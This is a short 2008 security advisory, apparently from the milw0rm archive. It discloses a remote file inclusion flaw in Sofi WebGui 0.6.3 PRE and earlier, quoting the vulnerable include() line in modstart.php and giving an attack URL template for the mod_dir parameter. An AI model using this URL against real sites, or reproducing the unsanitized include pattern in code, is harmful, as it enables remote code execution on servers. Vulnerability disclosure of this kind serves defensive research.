:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
#########################################################################
# [ Sofi WebGui <= 0.6.3 PRE ] Remote File Inclusion Vulnerability #
#########################################################################
#
# Script site: http://www.muskatli.net/studio/hu/?f=sofi-wgui-hu
# Download: http://www.muskatli.net/site/files/news_data/100004_100192_sofi_webgui_0.6.0.pre-release-3.tar.gz
#
# Vuln: http://site.com/sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=[spread???]
#
#
# Bug: ./sofi_webgui/hu/modules/reg-new/modstart.php (line: 26)
#
# ...
# if($ff=="") $ff = "index";
# $file_name = "m_$ff.php";
#
# //start web module
# include("$mod_dir/$file_name"); // RFI
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
# milw0rm.com [2008-09-23]